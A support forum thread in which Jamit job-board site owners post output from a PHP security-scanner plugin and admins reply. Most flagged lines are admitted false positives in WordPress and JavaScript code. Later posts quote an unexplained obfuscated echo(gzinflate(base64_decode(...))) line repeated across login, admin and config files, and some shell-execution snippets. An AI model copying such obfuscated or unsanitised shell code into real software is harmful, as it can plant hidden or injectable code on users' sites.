Jamit Software Forum
Welcome, Guest. Please login or register.
November 20, 2017, 03:38:45 am

Login with username, password and session length
Search:     Advanced search
May 27th, 2009 - Jamit Software Launches the forum today!
3,080 Posts in 791 Topics by 1,395,074 Members
Latest Member: CameronHow
* Home Help Search Login Register
+  Jamit Software Forum
|-+  Jamit Job Board Customers
| |-+  Security
| | |-+  Security Tools Plugin
« previous next »
Pages: 1 2 [3] Print
Author Topic: Security Tools Plugin  (Read 28370 times)
denbec
Jammers
Jr. Member
*
Posts: 15


« Reply #30 on: January 05, 2011, 04:06:05 am »

Happy New Year all!   Kiss

After a lot of work on my part, my site at http://www.nightowlstaffing.com was ranking very high on Google searches until around Dec. 30th 2010.  Suddenly it's not listed anywhere when searching for "2nd shift jobs" or "3rd shift jobs" (those used to be high ranking on the first page).  I suspected maybe the site was hacked but now I'm not sure.  I installed the latest version of Security Tools v2.1 (thanks for the program Adam!) and I got the results below.  Most of them are from my associated WordPress blog at http://www.nightowlstaffing.com/jobblog  If Peter, Adam or anyone has time to review these and let me know if they are real threats and what I should do next I would really appreciate it!

Thanks  in advance!

Dennis

Possibly bad code (execution of a shell command) /home/nightowl/public_html/testweb/locate_convert.php on line 5:
$retval = system ("locate convert");
Possibly bad code in (command execution) /home/nightowl/public_html/testweb/locate_convert.php on line 5:
$retval = system ("locate convert");
Possibly bad code (execution of a shell command) /home/nightowl/public_html/admin/suggest_permissions.php on line 118:
exec ('ls -o '.$temp, $output);
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-content/plugins/pretty-link/classes/models/PrliUpdate.php on line 228:
return base64_decode($client->getResponse());
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/theme.php on line 68:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/class-pclzip.php on line 3222:
// extracted in the filesystem (extract).
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 514:
* Assumes that WP_Filesystem() has already been called and set up. Does not extract a root-level __MACOSX directory, if present.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 570:
* Assumes that WP_Filesystem() has already been called and set up.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 652:
* Assumes that WP_Filesystem() has already been called and set up.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 724:
* Assumes that WP_Filesystem() has already been called and setup.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 774:
function WP_Filesystem( $args = false, $context = false ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/plugin.php on line 625:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/class-wp-upgrader.php on line 70:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/update-core.php on line 317:
if ( ! WP_Filesystem($credentials, ABSPATH) ) {
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-app.php on line 1457:
explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION'], 6)));
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-app.php on line 1462:
explode(':', base64_decode(substr($_SERVER['REDIRECT_REMOTE_USER'], 6)));
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/class-phpmailer.php on line 438:
if([email protected]$mail = popen($sendmail, 'w')) {
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 263:
define('SIMPLEPIE_PCRE_HTML_ATTRIBUTE', '((?:[\x09\x0A\x0B\x0C\x0D\x20]+[^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?)*)[\x09\x0A\x0B\x0C\x0D\x20]*');
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 9183:
if (isset($matches[$i][2][0]) && preg_match_all('/[\x09\x0A\x0B\x0C\x0D\x20]+([^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*)(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"([^"]*)"|\'([^\']*)\'|([^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?/', ' ' . $matches[$i][2][0] . ' ', $attribs, PREG_SET_ORDER))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 10775:
$curl = substr($curl, 5, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", 5));
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 10779:
$curl = substr($curl, 8, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", Cool);
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11048:
$space_characters = "\x20\x09\x0A\x0B\x0C\x0D";
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11255:
elseif (substr($data, 0, 20) === "\x00\x00\x00\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11257:
if ($pos = strpos($data, "\x00\x00\x00\x3F\x00\x00\x00\x3E"))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11268:
elseif (substr($data, 0, 20) === "\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C\x00\x00\x00")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11270:
if ($pos = strpos($data, "\x3F\x00\x00\x00\x3E\x00\x00\x00"))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11281:
elseif (substr($data, 0, 10) === "\x00\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11294:
elseif (substr($data, 0, 10) === "\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C\x00")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11307:
elseif (substr($data, 0, 5) === "\x3C\x3F\x78\x6D\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13583:
$ws = strspn($this->file->body, "\x09\x0A\x0B\x0C\x0D\x20");
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13603:
elseif (substr($this->file->body, 0, Cool === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13634:
elseif (substr($this->file->body, 0, Cool === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14820:
if (preg_match('/(&(#(x[0-9a-fA-F]+|[0-9]+)|[a-zA-Z0-9]+)|<\/[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>)/', $data))
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14832:
$data = base64_decode($data);
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14875:
$data = preg_replace('/(<[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*)' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . trim($attrib) . '(?:\s*=\s*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>/', '\1\2\3>', $data);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/class-snoopy.php on line 1015:
exec($this->curl_path." -k -D \"$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/Text/Diff/Engine/shell.php on line 50:
$diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-includes/class-IXR.php on line 249:
$value = base64_decode( trim( $this->_currentTagContents ) );
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php on line 31:
$data = shell_exec($cmd);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php on line 75:
$data = shell_exec($cmd);
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #31 on: January 06, 2011, 11:33:58 am »

.... they are quite annoying especially the one that lists the cache files as it seems to get longer each time....

Annoying? They are only cache files that Traffic Cop creates in order to speed up operation. There is nothing that I can do other than telling to Adam and he might make the Security Tools plugin ignore these cache files.

I am sure that the list of "possible threats" will never be empty, with new plugins being introduced and old plugins being revised constantly. You will still need to rely on your own judgment to some extent.
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
lithium
Jammers
Jr. Member
*
Posts: 13



WWW
« Reply #32 on: January 06, 2011, 11:57:00 am »

OK, thanks for the reply. Excellent plugin by the way, when you look at the deny log it makes you realise to how many threats are out there, keep up the good work!
Logged
denbec
Jammers
Jr. Member
*
Posts: 15


« Reply #33 on: January 09, 2011, 08:45:26 pm »

Has anyone had a chance to check my errors above?   Huh

Thanks in advance!

Dennis
Logged
Adam
Administrator
Hero Member
*****
Posts: 112


« Reply #34 on: January 12, 2011, 12:09:10 pm »

Hi Dennis,
Thanks for posting! The results seems ok, it looks like a lot of false-positives in Wordpress...I may need to adjust the plugin for these
You can also check Google Webmaster tools, they also provide report if any malware has been detected on your site.
Adam
Logged
denbec
Jammers
Jr. Member
*
Posts: 15


« Reply #35 on: January 14, 2011, 04:42:30 am »

Adam - thanks for your response!   Smiley

Just an FYI - my Google rankings are suddenly back where they were before with no intervention on my part.  Must have been a Google Thing.  Nice.    Roll Eyes

Logged
rutulo
Jammers
Sr. Member
*
Posts: 40


« Reply #36 on: September 02, 2011, 03:31:41 pm »

Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null


can you help me???  Shocked
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #37 on: September 09, 2011, 09:38:58 pm »

Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null


can you help me???  Shocked

Rutulo,

No problem! That's just the JavaScript code and there is nothing wrong with it!  Smiley
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
rutulo
Jammers
Sr. Member
*
Posts: 40


« Reply #38 on: September 10, 2011, 01:19:53 pm »

Thank's Peter!  Wink
Logged
Sparrotic
Jammers
Newbie
*
Posts: 1


« Reply #39 on: December 12, 2011, 02:08:20 am »

I just installed Jamit and a whole bunch of plugins, just got this security report,

Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null
Found 3 threats. Some may be false-positives. Please discuss this on the forum
---------------------------------
Possibly a rogue php file: /home/youhire1/public_html/cache/e4fe98bfc2jarfile.txt
Found 1 rogue files. Some may be false-positives

Any feedback, also wondering if I could get a general checkup on my site, I'm unexperienced just followed a bunch of tutorials, after paying someone thousands of dollars to do it for me a few years ago, only to end up with an unlicensed version, so I bought a license and did it myself

www.youhireme.com
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #40 on: December 12, 2011, 02:58:22 am »

I just installed Jamit and a whole bunch of plugins, just got this security report,

Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null
Found 3 threats. Some may be false-positives. Please discuss this on the forum
---------------------------------
Possibly a rogue php file: /home/youhire1/public_html/cache/e4fe98bfc2jarfile.txt
Found 1 rogue files. Some may be false-positives

Any feedback, also wondering if I could get a general checkup on my site, I'm unexperienced just followed a bunch of tutorials, after paying someone thousands of dollars to do it for me a few years ago, only to end up with an unlicensed version, so I bought a license and did it myself

www.youhireme.com

Hi, if you look about 2 messages up, you will see my earlier comment that those scw_js... files are OK.
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
maddisona
Jammers
Newbie
*
Posts: 6


WWW
« Reply #41 on: July 10, 2012, 10:50:16 am »

HI, Just ran the SCan PHP Files via the Security Tools. Informed to post to this forum (13 threats). can anyone offer any input/advice? Thanks in advance.

Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/lang/english_default.php on line 1434:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/index.php on line 7:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/login.php on line 22:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/main.php on line 157:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/index.php on line 15:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/login.php on line 10:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/index.php on line 81:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
 if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
 scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
 scwExpValDay.exec(scwArrSeed[2]) == null
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/config-default.php on line 320:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/main.php on line 157:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/index.php on line 11:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Found 13 threats. Please discuss this on the forum (Opens in a new window)
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #42 on: July 11, 2012, 01:00:00 am »

HI, Just ran the SCan PHP Files via the Security Tools. Informed to post to this forum (13 threats). can anyone offer any input/advice? Thanks in advance.

Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/lang/english_default.php on line 1434:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/index.php on line 7:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/login.php on line 22:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/main.php on line 157:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/index.php on line 15:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/login.php on line 10:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/index.php on line 81:
